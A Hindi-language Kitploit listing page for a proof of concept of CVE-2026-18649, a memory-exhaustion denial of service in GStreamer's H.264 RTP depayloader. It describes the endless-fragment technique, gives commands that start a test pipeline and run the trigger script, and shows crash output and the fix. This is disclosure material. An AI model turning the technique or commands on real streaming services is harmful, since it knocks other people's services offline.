Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-18649 — Proof of concept for CVE-2026-18649, a remote denial of service vulnerability in GStreamer's H.264 RTP depayloader (rtph264depay). | Kitploit
उपकरण/GitHubGitHub/0xsemizzz/cve-2026-18649
Payload GenerationVulnerability AnalysisExploitationNetwork Security
GitHub0xsemizzz/cve-2026-18649

CVE-2026-18649

Proof of concept for CVE-2026-18649, a remote denial of service vulnerability in GStreamer's H.264 RTP depayloader (rtph264depay).

रिपॉजिटरी देखें
114 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-18649 - GStreamer rtph264depay असीमित मेमोरी वृद्धि DoS

GStreamer के H.264 RTP depayloader (rtph264depay) में संसाधन समाप्ति भेद्यता के लिए अवधारणा का प्रमाण। यही पैटर्न rtph265depay को भी प्रभावित करता है।

यह क्या है

H.264 FU-A खंडित RTP पुनर्संयोजन के दौरान, प्रत्येक आने वाला खंड बिना किसी आकार सीमा के एक आंतरिक GstAdapter बफर में डाल दिया जाता है। एडेप्टर केवल तभी फ्लश होता है जब FU हेडर में अंत-खंड (E) बिट सेट होता है। एक दूरस्थ हमलावर एक मान्य प्रारंभ खंड भेजता है, फिर निरंतरता खंडों की एक अंतहीन धारा भेजता है जबकि E बिट कभी सेट नहीं करता। बफर तब तक बढ़ता रहता है जब तक प्रक्रिया की मेमोरी समाप्त नहीं हो जाती और वह क्रैश नहीं हो जाती।

  • दूरस्थ, किसी प्रमाणीकरण की आवश्यकता नहीं
  • केवल मान्य RTP पैकेट का उपयोग करता है, कोई विकृत डेटा नहीं
  • एक स्ट्रीम पर्याप्त है, कोई फ्लडिंग या कई कनेक्शन की आवश्यकता नहीं

CVE विवरण

  • CVE: CVE-2026-18649 (NVD)
  • CWE: CWE-770 (सीमा या थ्रॉटलिंग के बिना आवंटन)
  • CVSS: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
  • द्वारा खोजा गया: Yehia Ali Mohamed Ezzat (0xsemizzz)

पूर्ण विवरण: 0xsemizzz.vercel.app/projects/gstreamer-cve

प्रभावित संस्करण

अपस्ट्रीम फिक्स से पहले gst-plugins-good। 1.28.2 (Ubuntu 24.04) पर पुष्टि की गई।

त्वरित आरंभ

एक पाइपलाइन शुरू करें, फिर PoC चलाएं:

root@kitploit:~
gst-launch-1.0 udpsrc port=5036 buffer-size=4194304 \
  caps="application/x-rtp,media=video,payload=96,clock-rate=90000,encoding-name=H264" \
  ! rtph264depay ! fakesink &
PID=$!
python3 trigger.py 5036 $PID

तेजी से क्रैश के लिए, मेमोरी सीमा जोड़ें:

root@kitploit:~
ulimit -v 262144   # 256 MB, process dies in about 12 seconds
gst-launch-1.0 udpsrc port=5036 buffer-size=4194304 \
  caps="application/x-rtp,media=video,payload=96,clock-rate=90000,encoding-name=H264" \
  ! rtph264depay ! fakesink &
python3 trigger.py 5036 $!

अपेक्षित आउटपुट

root@kitploit:~
[*] port=5036  1 fragment every 0.5ms  (~2.8 MB/s)
[*] monitoring VmData (heap), not RSS
[*] target PID=12345  baseline VmData=26 MB

      5000 frags  ~     7 MB sent  |  VmData=35MB (+8MB)
     10000 frags  ~    13 MB sent  |  VmData=44MB (+17MB)
     15000 frags  ~    20 MB sent  |  VmData=53MB (+26MB)
     20000 frags  ~    27 MB sent  |  VmData=62MB (+35MB)
     25000 frags  ~    33 MB sent  |  VmData=71MB (+44MB)
     30000 frags  ~    40 MB sent  |  VmData=79MB (+53MB)
     ...
     DEAD

समाधान

rtph264depay और rtph265depay में एक max-reassembly-size गुण जोड़ा गया। अनुप्रयोगों को इसे एक उचित मान पर सेट करना चाहिए (वीडियो के लिए 16 MB सामान्य है)। पिछड़े संगतता के लिए डिफ़ॉल्ट 0 (असीमित) है।

टूल डाउनलोड करें